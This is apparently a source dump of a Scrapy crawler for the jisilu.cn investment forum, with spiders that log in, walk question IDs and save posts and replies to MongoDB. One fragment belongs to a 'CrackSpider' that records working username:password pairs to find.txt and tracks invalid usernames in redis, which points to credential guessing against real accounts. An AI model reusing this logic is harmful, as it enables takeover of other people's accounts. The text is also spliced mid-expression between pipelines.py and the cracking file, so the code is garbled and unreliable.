10 | import pymongo
11 | from collections import OrderedDict
12 | from scrapy.exporters import JsonLinesItemExporter
13 | from jsl.items import Relationship, JslItem
14 | from jsl import config
15 |
16 |
17 | class JslPipeline(object):
18 |
19 | def __init__(self):
20 | connect_uri = f'mongodb://{config.user}:{config.password}@{config.mongodb_host}:{config.mongodb_port}'
21 | self.db = pymongo.MongoClient(connect_uri)
22 | # self.user = u'neo牛3' # 修改为指定的用户名 如 毛之川 ,然后找到用户的id,在用户也的源码哪里可以找到 比如持有封基是8132
23 | # self.collection = self.db['db_parker']['jsl_20181108_allQuestion_test']
24 | self.collection = self.db['db_parker'][config.doc_name]
25 | self.relations = self.db['db_parker']['jsl_relationship']
26 | try:
27 | self.collection.ensure_index('question_id', unique=True)
28 | except Exception as e:
29 | pass
30 |
31 | def process_item(self, item, spider):
32 |
33 | if isinstance(item, JslItem):
34 | update_time = datetime.datetime.now()
35 | item = dict(item)
36 | item['update_time'] = update_time
37 |
38 |
39 | if self.collection.find_one({'question_id': item['question_id']},{'_id':1}):
40 | # 更新评论部分, 不更新就退出
41 | only_add = False
42 |
43 | try:
44 | only_add = item['only_add']
45 |
46 | except Exception as e:
47 | pass
48 |
49 | if not only_add:
50 | resp_no = self.collection.find_one({'question_id': item['question_id']},{'resp_no':1})
51 | resp_no_num = resp_no.get('resp_no')
52 |
53 | if resp_no_num- ', user)
149 | logger.info('password==>', password)
150 | with open('find.txt','a') as f:
151 | f.write(f'{user}:{password}')
152 | if js_data.get('err','')=='用户名或口令无效':
153 | print('无效,入redis')
154 | self.__redis.sadd('username_run',user)
155 |
156 | if __name__ == '__main__':
157 | spider = CrackSpider()
158 | spider.run()
159 |
--------------------------------------------------------------------------------
/jsl/spiders/questions_loop.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import re
3 | import scrapy
4 | from scrapy import Request, FormRequest
5 | from jsl.items import JslItem
6 | from jsl import config
7 | import logging
8 |
9 | LASTEST_ID = config.LASTEST_ID # 394716
10 |
11 |
12 | # 遍历所有questions id 看从哪里开始
13 | class AllcontentSpider(scrapy.Spider):
14 | name = 'questions_loop'
15 |
16 | headers = {
17 | 'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache',
18 | 'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01',
19 | 'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest',
20 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36',
21 | 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
22 | 'Referer': 'https://www.jisilu.cn/login/',
23 | 'Accept-Encoding': 'gzip,deflate,br',
24 | 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8'
25 | }
26 |
27 | def start_requests(self):
28 | login_url = 'https://www.jisilu.cn/login/'
29 | headers = {
30 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
31 | 'Accept-Encoding': 'gzip,deflate,br', 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8',
32 | 'Cache-Control': 'no-cache', 'Connection': 'keep-alive',
33 | 'Host': 'www.jisilu.cn', 'Pragma': 'no-cache', 'Referer': 'https://www.jisilu.cn/',
34 | 'Upgrade-Insecure-Requests': '1',
35 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36'}
36 |
37 | yield Request(url=login_url, headers=headers, callback=self.login, dont_filter=True)
38 |
39 | def login(self, response):
40 | url = 'https://www.jisilu.cn/account/ajax/login_process/'
41 | data = {
42 | 'return_url': 'https://www.jisilu.cn/',
43 | 'user_name': config.jsl_user,
44 | 'password': config.jsl_password,
45 | 'net_auto_login': '1',
46 | '_post_type': 'ajax',
47 | }
48 |
49 | yield FormRequest(
50 | url=url,
51 | headers=self.headers,
52 | formdata=data,
53 | callback=self.parse_,
54 | )
55 |
56 | def parse_(self, response):
57 | print(response.text)
58 | start_page = LASTEST_ID
59 |
60 | focus_url = 'https://www.jisilu.cn/question/{}'.format(start_page)
61 | yield Request(url=focus_url, headers=self.headers, callback=self.parse_item, meta={'question_id': start_page, 'dont_redirect': True,},
62 | dont_filter=True)
63 |
64 | def parse_item(self, response):
65 | question_id_ = response.meta['question_id']
66 |
67 | if '问题不存在或已被删除' in response.text:
68 | question_id = question_id_ - 1
69 | if question_id>1:
70 | focus_url = 'https://www.jisilu.cn/question/{}'.format(question_id)
71 |
72 | yield Request(url=focus_url, headers=self.headers, callback=self.parse_item,
73 | meta={'question_id': question_id, 'dont_redirect': True,}, dont_filter=True)
74 |
75 | else:
76 |
77 | question_id = question_id_ - 1
78 | print(question_id)
79 | if question_id > 1:
80 | focus_url = 'https://www.jisilu.cn/question/{}'.format(question_id)
81 |
82 | yield Request(url=focus_url, headers=self.headers, callback=self.parse_item,
83 | meta={'question_id': question_id, 'dont_redirect': True,}, dont_filter=True)
84 |
85 |
86 | item = JslItem()
87 |
88 | title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first()
89 | s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first()
90 |
91 | if s:
92 | ret = re.findall('(.*?)\.donate_user_avatar', s, re.S)
93 | else:
94 | ret = None
95 |
96 | try:
97 | content = ret[0].strip()
98 | except:
99 | content = None
100 |
101 | createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first()
102 |
103 | resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+')
104 |
105 | url = response.url
106 |
107 | # 添加发起人
108 | try:
109 | item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first()
110 | except Exception as e:
111 | print(e)
112 | item['creator'] = None
113 | try:
114 | item['title'] = title.strip()
115 | except Exception as e:
116 | item['title']=None
117 | item['content'] = content
118 |
119 | if resp_no is None:
120 | resp_no = 0
121 | # try:
122 | # item['resp_no'] = int(resp_no)
123 | # except Exception as e:
124 | # logging.warning(e)
125 | # logging.warning('没有回复')
126 | # item['resp_no'] = None
127 | item['only_add'] = True
128 | item['resp_no'] = int(resp_no)
129 | item['question_id'] = question_id_
130 | createTime = createTime.strip()
131 | if not re.search('^\d', createTime):
132 | createTime = createTime.replace('发表时间 ', '')
133 | # createTime = None
134 | # self.logger.error('创建日期有误:{}'.format(url))
135 | if not re.match('\d{4}-\d{2}-\d{2} \d{2}:\d{2}', createTime):
136 | self.logger.error('创建日期有误:{}'.format(url))
137 | self.logger.error(createTime)
138 | createTime = None
139 | #
140 | item['createTime'] = createTime
141 | item['url'] = url.strip()
142 | resp = []
143 | last_resp_date = None
144 | for index, reply in enumerate(
145 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
146 | replay_user = reply.xpath('.//div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
147 |
148 | if last_resp_date is None:
149 | last_resp_date = reply.xpath('.//div[@class="aw-dynamic-topic-meta"]/span/text()').extract_first()
150 |
151 | rep_content = reply.xpath(
152 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]/text()').extract_first()
153 | # print rep_content
154 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
155 | try:
156 | int(agree)
157 | except:
158 | agree = 0
159 |
160 | resp.append({replay_user.strip() + '_{}'.format(index): [int(agree), rep_content.strip()]})
161 |
162 | item['resp'] = resp
163 | item['last_resp_date'] = last_resp_date
164 |
165 | yield item
166 |
167 |
--------------------------------------------------------------------------------
/jsl/spiders/jisilu_user_content.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import datetime
3 | import logging
4 | import re
5 | import scrapy
6 | from jsl.items import JslItem
7 | from jsl import config
8 | from jsl.spiders.aes_encode import decoder
9 | from scrapy import Request,FormRequest
10 | # 获取某个用户的所有帖子,主要为了慎防大v要删帖,快速下载
11 |
12 | class JisiluSpider(scrapy.Spider):
13 | name = 'single_user'
14 | DETAIL_URL = 'https://www.jisilu.cn/question/{}&sort_key=agree_count&sort=DESC'
15 | MULTI_PAGE_DETAIL = 'https://www.jisilu.cn/question/id-{}__sort_key-__sort-DESC__uid-__page-{}'
16 |
17 | def __init__(self):
18 | super(JisiluSpider,self).__init__()
19 |
20 | self.headers = {
21 | 'Accept-Language': ' zh-CN,zh;q=0.9', 'Accept-Encoding': ' gzip, deflate, br',
22 | 'X-Requested-With': ' XMLHttpRequest', 'Host': ' www.jisilu.cn', 'Accept': ' */*',
23 | 'User-Agent': ' Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36',
24 | 'Connection': ' keep-alive',
25 | 'Pragma': ' no-cache', 'Cache-Control': ' no-cache',
26 | 'Referer': ' https://www.jisilu.cn/people/dbwolf'
27 | }
28 |
29 | # self.uid = '83220' # 这个id需要在源码页面里面去找
30 | self.uid = config.uid
31 |
32 | self.list_url = 'https://www.jisilu.cn/people/ajax/user_actions/uid-{}__actions-101__page-{}'
33 |
34 |
35 | def start_requests(self):
36 |
37 | login_url = 'https://www.jisilu.cn/login/'
38 | headersx = {
39 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
40 | 'Accept-Encoding': 'gzip,deflate,br', 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8',
41 | 'Cache-Control': 'no-cache', 'Connection': 'keep-alive',
42 | 'Host': 'www.jisilu.cn', 'Pragma': 'no-cache', 'Referer': 'https://www.jisilu.cn/',
43 | 'Upgrade-Insecure-Requests': '1',
44 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36'}
45 |
46 | yield Request(url=login_url, headers=headersx, callback=self.login, dont_filter=True)
47 |
48 | def login(self, response):
49 | url = 'https://www.jisilu.cn/account/ajax/login_process/'
50 | username = decoder(config.jsl_user)
51 | jsl_password = decoder(config.jsl_password)
52 | data = {
53 | 'return_url': 'https://www.jisilu.cn/',
54 | 'user_name': username,
55 | 'password': jsl_password,
56 | 'net_auto_login': '1',
57 | '_post_type': 'ajax',
58 | }
59 |
60 | yield FormRequest(
61 | url=url,
62 | headers=self.headers,
63 | formdata=data,
64 | callback=self.start_fetch_user,
65 | dont_filter=True,
66 |
67 | )
68 |
69 |
70 | def start_fetch_user(self,response):
71 | current_page=0
72 | yield scrapy.Request(self.list_url.format(self.uid,current_page),headers=self.headers,meta={'current_page':current_page},callback=self.parse)
73 |
74 | def parse(self, response,**kwargs):
75 | current_page = response.meta['current_page']
76 | link_list = response.xpath('//body/div[@class="aw-item"]')
77 | if link_list is None:
78 | return
79 |
80 | for link in link_list:
81 | link_=link.xpath('.//div[@class="aw-mod"]/div[@class="aw-mod-head"]/h4/a/@href').extract_first()
82 | match = re.search('/question/(\d+)',link_)
83 | if match:
84 | question_id = match.group(1)
85 | yield scrapy.Request(self.DETAIL_URL.format(question_id),
86 | headers=self.headers,
87 | callback=self.parse_item,
88 | meta={'question_id':question_id})
89 |
90 | current_page=current_page+1
91 | yield scrapy.Request(self.list_url.format(self.uid,current_page),headers=self.headers,meta={'current_page':current_page},callback=self.parse)
92 |
93 |
94 | def check_detail(self,response,**kwargs):
95 |
96 | if '您访问的资源需要购买会员' in response.text:
97 | return
98 |
99 | question_id = response.meta['question_id']
100 | more_page = response.xpath('//div[@class="pagination pull-right"]')
101 |
102 | item = JslItem()
103 | title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first()
104 | s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first()
105 | ret = re.findall('(.*?)\.donate_user_avatar', s, re.S)
106 | item['question_id'] = question_id
107 |
108 | try:
109 | content = ret[0].strip()
110 | except Exception as e:
111 | logging.error(e)
112 | content = None
113 |
114 | createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first()
115 | # 'aw-question-detail-meta'
116 | resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+')
117 |
118 | url = response.url
119 |
120 | # 添加发起人
121 | try:
122 | item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first()
123 | except Exception as e:
124 | logging.error(e)
125 | item['creator'] = None
126 |
127 | item['title'] = title.strip()
128 | item['content'] = content
129 | try:
130 | item['resp_no'] = int(resp_no)
131 | except Exception as e:
132 | # logging.warning('没有回复')
133 | item['resp_no'] = 0
134 |
135 | item['createTime'] = createTime.replace('发表时间 ', '')
136 | item['crawlTime'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
137 | item['url'] = url.strip()
138 | # item['html'] = response.text
139 | # item['last_resp_date'] = response.meta['last_resp_date']
140 |
141 | # 多页
142 | if more_page:
143 |
144 | total_resp_no = item['resp_no']
145 | total_page = total_resp_no // 100 + 1
146 | item['resp'] = []
147 |
148 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, 1), headers=self.headers,
149 | callback=self.multi_page_detail,
150 | meta={'question_id': question_id, 'page': 1, 'total_page': total_page,
151 | 'item': item})
152 |
153 | else:
154 |
155 | resp_ = []
156 | # 回复内容
157 | resp_time_list = []
158 | for index, reply in enumerate(
159 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
160 | replay_user = reply.xpath(
161 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
162 | rep_content = reply.xpath(
163 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath(
164 | 'string(.)').extract_first()
165 |
166 | # 注意这里为了从用户初采集,加了这个字段
167 | rep_time = reply.xpath('.//div[@class="pull-left aw-dynamic-topic-content"]//div[@class="aw-dynamic-topic-meta"]/span/text()').extract_first()
168 | resp_time_list.append(rep_time)
169 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
170 | if agree is None:
171 | agree = 0
172 | else:
173 | agree = int(agree)
174 |
175 | resp_.append(
176 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}})
177 | if len(resp_time_list)>0:
178 | resp_time = resp_time_list[0]
179 | else:
180 | resp_time=None
181 | item['resp'] = resp_
182 | item['last_resp_date']=resp_time
183 |
184 | yield item
185 |
186 | # 详情页
187 | def multi_page_detail(self, response):
188 |
189 | current_page = response.meta['page']
190 | item = response.meta['item']
191 | total_page = response.meta['total_page']
192 | question_id = response.meta['question_id']
193 |
194 | resp_len = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]/div')
195 |
196 | for index, reply in enumerate(
197 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
198 | replay_user = reply.xpath(
199 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
200 | rep_content = reply.xpath(
201 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath(
202 | 'string(.)').extract_first()
203 | if rep_content:
204 | rep_content = rep_content.strip()
205 | # rep_content = '\n'.join(rep_content)
206 |
207 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
208 | if agree is None:
209 | agree = 0
210 | else:
211 | agree = int(agree)
212 |
213 | item['resp'].append(
214 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}})
215 |
216 | current_page += 1
217 |
218 | if current_page <= total_page:
219 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, current_page), headers=self.headers,
220 | callback=self.multi_page_detail,
221 | meta={'question_id': question_id, 'page': current_page, 'total_page': total_page,
222 | 'item': item})
223 | else:
224 | yield item
--------------------------------------------------------------------------------
/jsl/spiders/weekly_content.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import datetime
3 | import re
4 | import scrapy
5 | from scrapy import Request, FormRequest
6 | from jsl.items import JslItem
7 | from jsl import config
8 | import logging
9 | from jsl.spiders.aes_encode import decoder
10 | import pymongo
11 |
12 | # 按照日期爬取, 会损失新人贴
13 |
14 | class WeekContentSpider(scrapy.Spider):
15 | name = 'week_content'
16 |
17 | headers = {
18 | 'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache',
19 | 'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01',
20 | 'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest',
21 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36',
22 | 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
23 | 'Referer': 'https://www.jisilu.cn/login/',
24 | 'Accept-Encoding': 'gzip,deflate,br',
25 | 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8'
26 | }
27 |
28 | start_page = 1
29 |
30 | POST_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-add_time__category-__day-0__is_recommend-__page-{}' # 发帖日期
31 | RESP_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-new__category-__day-0__is_recommend-__page-{}' # 回帖按照日期
32 | DETAIL_URL = 'https://www.jisilu.cn/question/{}&sort_key=agree_count&sort=DESC'
33 | MULTI_PAGE_DETAIL = 'https://www.jisilu.cn/question/id-{}__sort_key-__sort-DESC__uid-__page-{}'
34 |
35 | def __init__(self, daily='yes', *args, **kwargs):
36 | super().__init__(*args, **kwargs)
37 |
38 | if daily == 'yes':
39 |
40 | self.logger.info('按照周')
41 | self.DAYS = 14 # 获取2年的帖子
42 | self.URL = self.POST_DATE_URL
43 |
44 | self.last_week = datetime.datetime.now() + datetime.timedelta(days=-1 * self.DAYS)
45 |
46 |
47 | connect_uri = f'mongodb://{config.user}:{config.password}@{config.mongodb_host}:{config.mongodb_port}'
48 | self.db = pymongo.MongoClient(connect_uri)
49 | # self.user = u'neo牛3' # 修改为指定的用户名 如 毛之川 ,然后找到用户的id,在用户也的源码哪里可以找到 比如持有封基是8132
50 | self.collection = self.db['db_parker'][config.doc_name]
51 |
52 | def start_requests(self):
53 |
54 | login_url = 'https://www.jisilu.cn/login/'
55 | headersx = {
56 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
57 | 'Accept-Encoding': 'gzip,deflate,br', 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8',
58 | 'Cache-Control': 'no-cache', 'Connection': 'keep-alive',
59 | 'Host': 'www.jisilu.cn', 'Pragma': 'no-cache', 'Referer': 'https://www.jisilu.cn/',
60 | 'Upgrade-Insecure-Requests': '1',
61 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36'}
62 |
63 | yield Request(url=login_url, headers=headersx, callback=self.login, dont_filter=True)
64 |
65 | def login(self, response):
66 | url = 'https://www.jisilu.cn/account/ajax/login_process/'
67 | username = decoder(config.jsl_user)
68 | jsl_password = decoder(config.jsl_password)
69 | data = {
70 | 'return_url': 'https://www.jisilu.cn/',
71 | 'user_name': username,
72 | 'password': jsl_password,
73 | 'net_auto_login': '1',
74 | '_post_type': 'ajax',
75 | }
76 |
77 | yield FormRequest(
78 | url=url,
79 | headers=self.headers,
80 | formdata=data,
81 | callback=self.parse,
82 | dont_filter=True
83 | )
84 |
85 | def parse(self, response, **kwargs):
86 | print('登录后', response.text)
87 | focus_url = self.URL.format(self.start_page)
88 |
89 | yield Request(url=focus_url, headers=self.headers, callback=self.parse_page, dont_filter=True,
90 | meta={'page': self.start_page})
91 |
92 | def parse_page(self, response):
93 |
94 | current_page = response.meta['page']
95 |
96 | nodes = response.xpath('//div[@class="aw-question-list"]/div')
97 | last_resp_date = None
98 |
99 | for node in nodes:
100 |
101 | each_url = node.xpath('.//h4/a/@href').extract_first()
102 | try:
103 | last_resp_date = node.xpath('.//div[@class="aw-questoin-content"]/span/text()').extract()[-1].strip()
104 | # '回复 • 2018-12-10 09:49 • 46335 次浏览'
105 | last_resp_date = re.search('• (.*?) •', last_resp_date).group(1)
106 | except:
107 | logging.error('failed to find date')
108 | continue
109 | else:
110 | # 访问详情
111 | # 替换成这个 'https://www.jisilu.cn/question/320215&sort_key=agree_count&sort=DESC'
112 | # '"https://www.jisilu.cn/question/336326"'
113 | if re.search('www.jisilu.cn/question/\d+', each_url):
114 | question_id = re.search('www\.jisilu\.cn/question/(\d+)', each_url).group(1)
115 |
116 | # if self.question_exist(question_id):
117 | # continue
118 |
119 | # print(f'{question_id}帖子不存在,下载')
120 |
121 | last_resp_date = datetime.datetime.strptime(last_resp_date, '%Y-%m-%d %H:%M')
122 | yield Request(url=self.DETAIL_URL.format(question_id), headers=self.headers,
123 | callback=self.check_detail,
124 | meta={'last_resp_date': last_resp_date, 'question_id': question_id})
125 |
126 | # 继续翻页
127 | # print(last_resp_date)
128 | if last_resp_date is not None and isinstance(last_resp_date,str):
129 | last_resp_date = datetime.datetime.strptime(last_resp_date, '%Y-%m-%d %H:%M')
130 |
131 | if last_resp_date is not None and (self.last_week < last_resp_date):
132 | # logging.info('last_resp_date ===== {}'.format(last_resp_date))
133 |
134 | current_page += 1
135 | yield Request(url=self.URL.format(current_page), headers=self.headers, callback=self.parse_page,
136 | meta={'page': current_page})
137 |
138 | def question_exist(self,_id):
139 | return True if self.collection.find_one({'question_id':_id},{'_id':1}) else False
140 |
141 | def compose_content(self,content_list):
142 | string = ""
143 | for line in content_list:
144 | line = line.strip()
145 | if len(line)>0:
146 | string+=line+'\n'
147 | return string
148 |
149 | def check_detail(self, response):
150 |
151 | if '您访问的资源需要购买会员' in response.text:
152 | return
153 |
154 | question_id = response.meta['question_id']
155 | last_resp_date=response.meta['last_resp_date']
156 | more_page = response.xpath('//div[@class="pagination pull-right"]')
157 |
158 | item = JslItem()
159 | item['last_resp_date'] = last_resp_date
160 |
161 | title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first()
162 | item['question_id'] = question_id
163 | content_node = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]')
164 |
165 | content_html = content_node.extract_first() # 获取到源码
166 |
167 | # s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first()
168 | # ret = re.findall('(.*?)\.donate_user_avatar', s, re.S)
169 | # try:
170 | # content = ret[0].strip()
171 | # except Exception as e:
172 | # # logging.error(e)
173 | # content = None
174 |
175 | content_list = content_node.xpath('string(.)').extract()
176 | content_str = self.compose_content(content_list)
177 |
178 | createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first()
179 | # 'aw-question-detail-meta'
180 | resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+')
181 |
182 | url = response.url
183 |
184 | # 添加发起人
185 | try:
186 | item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first()
187 | except Exception as e:
188 | # logging.error(e)
189 | item['creator'] = None
190 |
191 | item['title'] = title.strip()
192 | item['content'] = content_str
193 | item['content_html'] = content_html
194 |
195 | try:
196 | item['resp_no'] = int(resp_no)
197 | except Exception as e:
198 | # logging.warning('没有回复')
199 | item['resp_no'] = 0
200 | if createTime is None:
201 | # print(title)
202 | # print(content)
203 | return
204 | item['createTime'] = createTime.replace('发表时间 ', '')
205 | item['crawlTime'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
206 | item['url'] = url.strip().replace('&sort_key=agree_count&sort=DESC','')
207 |
208 | # 多页
209 | if more_page:
210 |
211 | total_resp_no = item['resp_no']
212 | total_page = total_resp_no // 100 + 1
213 | item['resp'] = []
214 |
215 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, 1), headers=self.headers,
216 | callback=self.multi_page_detail,
217 | meta={'question_id': question_id, 'page': 1, 'total_page': total_page,
218 | 'item': item})
219 |
220 | else:
221 |
222 | resp_ = []
223 | # 回复内容
224 | for index, reply in enumerate(
225 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
226 | replay_user = reply.xpath(
227 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
228 | rep_content = reply.xpath(
229 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath(
230 | 'string(.)').extract_first()
231 | # rep_content = '\n'.join(rep_content)
232 |
233 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
234 | if agree is None:
235 | agree = 0
236 | else:
237 | agree = int(agree)
238 |
239 | resp_.append(
240 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}})
241 |
242 | item['resp'] = resp_
243 | yield item
244 |
245 | # 详情页
246 | def multi_page_detail(self, response):
247 |
248 | current_page = response.meta['page']
249 | item = response.meta['item']
250 | total_page = response.meta['total_page']
251 | question_id = response.meta['question_id']
252 |
253 | resp_len = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]/div')
254 |
255 | for index, reply in enumerate(
256 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
257 | replay_user = reply.xpath(
258 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
259 | rep_content = reply.xpath(
260 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath(
261 | 'string(.)').extract_first()
262 | if rep_content:
263 | rep_content = rep_content.strip()
264 |
265 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
266 | if agree is None:
267 | agree = 0
268 | else:
269 | agree = int(agree)
270 |
271 | item['resp'].append(
272 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}})
273 |
274 | current_page += 1
275 |
276 | if current_page <= total_page:
277 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, current_page), headers=self.headers,
278 | callback=self.multi_page_detail,
279 | meta={'question_id': question_id, 'page': current_page, 'total_page': total_page,
280 | 'item': item})
281 | else:
282 | yield item
283 |
--------------------------------------------------------------------------------
/jsl/spiders/allcontent.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import datetime
3 | import re
4 | import scrapy
5 | from scrapy import Request, FormRequest
6 | from jsl.items import JslItem
7 | from jsl import config
8 | import logging
9 | from jsl.spiders.aes_encode import decoder
10 | import pymongo
11 |
12 | # 按照日期爬取, 会损失新人贴
13 |
14 | class AllcontentSpider(scrapy.Spider):
15 | name = 'allcontent'
16 |
17 | headers = {
18 | 'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache',
19 | 'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01',
20 | 'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest',
21 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36',
22 | 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
23 | 'Referer': 'https://www.jisilu.cn/login/',
24 | 'Accept-Encoding': 'gzip,deflate,br',
25 | 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8'
26 | }
27 |
28 | start_page = 1
29 |
30 | POST_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-add_time__category-__day-0__is_recommend-__page-{}' # 发帖日期
31 | RESP_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-new__category-__day-0__is_recommend-__page-{}' # 回帖按照日期
32 | DETAIL_URL = 'https://www.jisilu.cn/question/{}&sort_key=agree_count&sort=DESC'
33 | MULTI_PAGE_DETAIL = 'https://www.jisilu.cn/question/id-{}__sort_key-__sort-DESC__uid-__page-{}'
34 |
35 | def __init__(self, daily='yes', *args, **kwargs):
36 | super().__init__(*args, **kwargs)
37 |
38 | if daily == 'yes':
39 | self.DAYS = config.DAYS
40 | self.URL = self.POST_DATE_URL
41 |
42 | elif daily == 'no':
43 | # 全站爬取
44 | self.logger.info('全站爬取')
45 | self.DAYS = 365 * 2 # 获取2年的帖子
46 | self.URL = self.RESP_DATE_URL # 根据回复时间
47 | else:
48 | return
49 | self.last_week = datetime.datetime.now() + datetime.timedelta(days=-1 * self.DAYS)
50 |
51 |
52 | connect_uri = f'mongodb://{config.user}:{config.password}@{config.mongodb_host}:{config.mongodb_port}'
53 | self.db = pymongo.MongoClient(connect_uri)
54 | # self.user = u'neo牛3' # 修改为指定的用户名 如 毛之川 ,然后找到用户的id,在用户也的源码哪里可以找到 比如持有封基是8132
55 | self.collection = self.db[config.db_name][config.doc_name]
56 |
57 | def start_requests(self):
58 |
59 | login_url = 'https://www.jisilu.cn/login/'
60 | headersx = {
61 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
62 | 'Accept-Encoding': 'gzip,deflate,br', 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8',
63 | 'Cache-Control': 'no-cache', 'Connection': 'keep-alive',
